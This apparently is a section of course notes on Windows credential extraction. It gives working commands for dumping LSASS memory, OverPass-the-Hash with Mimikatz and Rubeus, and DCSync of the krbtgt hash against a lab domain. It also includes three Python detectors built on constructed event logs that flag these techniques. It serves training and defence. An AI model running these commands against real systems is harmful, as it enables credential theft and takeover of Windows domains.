6.2 - Credentials Extraction & Mimikatz

LSA & LSASS

The Local Security Authority (LSA) is a key component of the Windows security subsystem responsible for enforcing security policies, managing authentication, and storing sensitive data like user credentials and security tokens. It plays a crucial role in handling authentication requests, verifying user identities, and interacting with Active Directory in domain environments.

The Local Security Authority Subsystem Service (LSASS) is the process (lsass.exe) that runs LSA in user mode. It is responsible for authenticating users, managing access tokens, and storing credential hashes in memory. Due to its critical role, LSASS is a high-value target for attackers seeking to extract credentials, perform pass-the-hash attacks, or manipulate authentication mechanisms. Protecting LSASS is essential for maintaining system security, which is why modern Windows versions implement protections like Credential Guard and LSASS memory restrictions.

Extract Credentials without LSASS

Credentials can also be recovered without touching LSASS, which is stealthier than dumping its memory. The sources are:

  • SAM hive (Registry) - Local credentials

  • LSA Secrets / Security Hive (Registry) - Service account passwords, domain cached credentials

  • DPAPI Protected Credentials (Disk) - Credentials Manager / Vault, Browser Cookies, Certificates and Azure Tokens.

Mimikatz

Mimikatz is a powerful tool used for credential dumping, ticket extraction, and various attacks against Windows authentication mechanisms. Invoke-Mimikatz is a PowerShell-based version that leverages ReflectivePEInjection to load Mimikatz directly into memory, avoiding the need for writing files to disk. This makes it stealthier than traditional methods.

Running Invoke-Mimikatz requires administrative privileges, and some attacks need additional privileges, which will be discussed in their respective sections.


Extracting Credentials from LSASS

All of the techniques below require local administrator access on the machine.

Mimikatz

To dump credentials (e.g. NTLM hashes, AES keys) from LSASS on the local machine using Invoke-Mimikatz, run:

Invoke-Mimikatz -Command "sekurlsa::ekeys"

SafetyKatz

SafetyKatz takes a minidump of LSASS and then loads Mimikatz through PELoader to parse it:

SafetyKatz.exe "sekurlsa::ekeys"

SharpKatz

SharpKatz is a C# implementation of certain Mimikatz functionalities:

SharpKatz.exe --Command ekeys

Dumpert (Direct System Calls & API Unhooking)

Dumpert evades user-mode hooks placed by security products by using direct system calls and API unhooking:

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Pypykatz (Python-based Mimikatz Alternative)

To extract credentials with the Python-based alternative:

pypykatz.exe live lsa

Comsvcs.dll for LSASS Dump

A built-in Windows DLL exports a MiniDump function that can be used to write LSASS memory to disk (look up the PID first, then dump):

tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\Users\Public\lsass.dmp full
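From the defender's side, every technique in this section either opens a handle to lsass.exe or runs a recognisable command line. The following detection logic is an added example (not from the original notes) that classifies constructed Sysmon-style events: Event ID 10 (ProcessAccess) records with suspicious GrantedAccess masks on lsass.exe, and Event ID 1 (ProcessCreate) records carrying the comsvcs.dll MiniDump pattern or the tool names above. The allowlist and the sample events are assumptions to be tuned per environment.

```python
"""Classify constructed Sysmon-style events for LSASS credential dumping."""
from typing import Dict, List

# Sysmon EID 10 GrantedAccess masks commonly seen when tooling reads LSASS:
# 0x1010 = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION (sekurlsa-style read),
# 0x1FFFFF = PROCESS_ALL_ACCESS (minidump-style tools).
SUSPICIOUS_ACCESS = {0x1010, 0x1038, 0x1410, 0x1438, 0x1FFFFF}
# Processes that legitimately open LSASS on a typical host (assumed allowlist).
ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}


def classify(event: Dict[str, str]) -> str:
    """Return a finding label for one event, or '' when it looks benign."""
    eid = event["EventID"]
    if eid == "10" and event["TargetImage"].lower().endswith(r"\lsass.exe"):
        src = event["SourceImage"].lower()
        granted = int(event["GrantedAccess"], 16)
        if src in ALLOWLIST or granted not in SUSPICIOUS_ACCESS:
            return ""
        return f"lsass-access {src} 0x{granted:x}"
    if eid == "1":
        cmd = event.get("CommandLine", "").lower()
        # comsvcs.dll MiniDump export, or the named tools from this section.
        if "comsvcs.dll" in cmd and "minidump" in cmd:
            return "lsass-dump comsvcs MiniDump"
        if any(t in cmd for t in ("sekurlsa::", "pypykatz", "safetykatz", "dumpert")):
            return "credential-tool " + cmd.split()[0]
    return ""


def scan(events: List[Dict[str, str]]) -> List[str]:
    """Run classify() over a batch and keep only the findings."""
    return [f for f in (classify(e) for e in events) if f]


# Constructed sample events (not captured from a real host).
SAMPLE = [
    {"EventID": "10", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": "10", "SourceImage": r"C:\Users\Public\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": "1", "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll, "
                                    r"MiniDump 624 C:\Users\Public\lsass.dmp full"},
    {"EventID": "1", "CommandLine": r"notepad.exe C:\Users\bob\notes.txt"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Pairing the access-mask check with a CallTrace allowlist (e.g. unbacked memory regions) reduces false positives from EDR agents that legitimately read LSASS.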

Remote Credential Dumping

From a Linux machine, you can use:

  • Impacket for remote credential extraction.

  • Physmem2profit for memory analysis and credential retrieval.


After extracting credentials, they can be used for Pass-the-Hash, Pass-the-Ticket or OverPass-the-Hash.

OverPass-The-Hash (Pass-the-Key)

OverPass-the-Hash (OPTH) allows an attacker to generate Kerberos authentication tokens from NTLM hashes or Kerberos keys. It requires administrator rights when performed with Mimikatz or SafetyKatz, and no elevation when performed with Rubeus.

With Pass-the-Hash the NTLM hash is read and used directly in place of the password, typically with local account credentials (e.g. the local administrator of a machine). OverPass-the-Hash instead uses the NTLM hash or AES key to obtain a Kerberos TGT and authenticate as a domain user, usually by spawning a new PowerShell session.

Invoke-Mimikatz

To perform OPTH with AES256 encryption:

Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"

SafetyKatz

SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe"

This starts a new session (powershell.exe or cmd.exe, whichever is given in /run) with logon type 9 (equivalent to runas /netonly).

Rubeus (Kerberos-focused Attack)

For OPTH using NTLM hashes (doesn’t require elevation):

Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt

For OPTH with AES256 encryption (requires elevation):

Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
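Two log artefacts follow from the OPTH variants above: the /run variant produces a 4624 logon with LogonType 9 through the seclogo logon process, and the /rc4 variant makes the DC issue an RC4-encrypted TGT (4768 with TicketEncryptionType 0x17) in a domain whose users would normally get AES. The following hunt over constructed Windows Security events is an added example (not from the original notes); field names follow the Security log schema, and the sample records are assumptions.

```python
"""Hunt constructed Security events for OverPass-the-Hash indicators."""
from typing import Dict, List

RC4_HMAC = 0x17  # TicketEncryptionType for RC4; AES256 is 0x12, AES128 is 0x11


def is_netonly_logon(ev: Dict[str, str]) -> bool:
    """4624 with LogonType 9 via the 'seclogo' logon process is what
    sekurlsa::pth /run and runas /netonly produce; rare for ordinary users."""
    return (ev["EventID"] == "4624" and ev["LogonType"] == "9"
            and ev.get("LogonProcessName", "").lower() == "seclogo"
            and ev.get("AuthenticationPackageName", "").lower() == "negotiate")


def is_rc4_tgt_request(ev: Dict[str, str]) -> bool:
    """4768 (TGT requested) with RC4 encryption for a user account. AES-capable
    domains issue AES tickets by default, so an RC4 TGT for a user points at an
    asktgt /rc4:<hash> style request (or a legacy client worth investigating)."""
    if ev["EventID"] != "4768":
        return False
    user = ev["TargetUserName"]
    return (not user.endswith("$")  # ignore computer accounts
            and int(ev["TicketEncryptionType"], 16) == RC4_HMAC)


def hunt(events: List[Dict[str, str]]) -> List[str]:
    """Return one finding string per suspicious event."""
    findings = []
    for ev in events:
        if is_netonly_logon(ev):
            findings.append(f"netonly-logon {ev['TargetUserName']} on {ev['Computer']}")
        elif is_rc4_tgt_request(ev):
            findings.append(f"rc4-tgt {ev['TargetUserName']} from {ev['IpAddress']}")
    return findings


# Constructed sample events (not captured from a real domain).
SAMPLE = [
    {"EventID": "4624", "Computer": "WS01", "TargetUserName": "administrator",
     "LogonType": "9", "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    {"EventID": "4624", "Computer": "WS01", "TargetUserName": "bob",
     "LogonType": "2", "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
    {"EventID": "4768", "TargetUserName": "administrator", "TicketEncryptionType": "0x17",
     "IpAddress": "10.0.0.25"},
    {"EventID": "4768", "TargetUserName": "WS01$", "TicketEncryptionType": "0x12",
     "IpAddress": "10.0.0.25"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE):
        print(finding)
```

The AES variants (/aes256 with /opsec) do not trigger the RC4 check, which is why the logon-type-9 check and a baseline of which hosts normally run runas /netonly remain necessary.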

DCSync Attack (Extracting Credentials from the Domain Controller)

DCSync abuses Active Directory replication to pull password hashes from a Domain Controller without executing code on it.

Mimikatz

Extracting the krbtgt Hash

To obtain the krbtgt hash using DCSync (requires Domain Admin privileges):

Invoke-Mimikatz -Command "lsadump::dcsync /user:us\krbtgt"

SafetyKatz

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt"

By default, only Domain Admins, Enterprise Admins and Domain Controllers hold the replication rights needed to execute this attack.
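Because DCSync is a replication request, the DC records it as Security event 4662 with AccessMask 0x100 (control access) and the replication control-access-right GUIDs in the Properties field. The following check over constructed 4662 records is an added example (not from the original notes): it flags replication requests from any principal that is not a known DC computer account. The set of DC accounts and the sample records are assumptions.

```python
"""Flag DCSync-style replication requests in constructed 4662 events."""
from typing import Dict, List, Set

# Control-access rights that permit directory replication. A request that
# includes Get-Changes-All is the one that returns secrets (password hashes).
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET = "89e95b76-444d-4c62-991a-0facbeda640c"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL,
                     DS_REPLICATION_GET_CHANGES_IN_FILTERED_SET}


def is_dcsync(ev: Dict[str, str], dc_accounts: Set[str]) -> bool:
    """4662 with a replication control-access right by a non-DC principal."""
    if ev["EventID"] != "4662" or ev.get("AccessMask") != "0x100":
        return False
    props = ev.get("Properties", "").lower()
    if not any(g in props for g in REPLICATION_GUIDS):
        return False
    # DCs replicate with each other; their machine accounts are expected here.
    return ev["SubjectUserName"] not in dc_accounts


def hunt(events: List[Dict[str, str]], dc_accounts: Set[str]) -> List[str]:
    """Return one finding per suspicious replication request."""
    return [f"dcsync {e['SubjectUserName']} ({e['SubjectDomainName']}) -> {e['ObjectName']}"
            for e in events if is_dcsync(e, dc_accounts)]


# Constructed sample records (not captured from a real DC). The domain DN is a placeholder.
DC_ACCOUNTS = {"DC01$", "DC02$"}
SAMPLE = [
    {"EventID": "4662", "SubjectUserName": "DC02$", "SubjectDomainName": "US",
     "ObjectName": "DC=us,DC=techcorp,DC=local", "AccessMask": "0x100",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"EventID": "4662", "SubjectUserName": "svc_backup", "SubjectDomainName": "US",
     "ObjectName": "DC=us,DC=techcorp,DC=local", "AccessMask": "0x100",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"EventID": "4662", "SubjectUserName": "alice", "SubjectDomainName": "US",
     "ObjectName": "CN=alice,CN=Users,DC=us,DC=techcorp,DC=local", "AccessMask": "0x100",
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE, DC_ACCOUNTS):
        print(finding)
```

Auditing of Directory Service Access must be enabled on the DCs for 4662 to be generated at all; without it the attack leaves no trace in the Security log.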


Other Resources:

Labs

See the Learning Object 7 lab.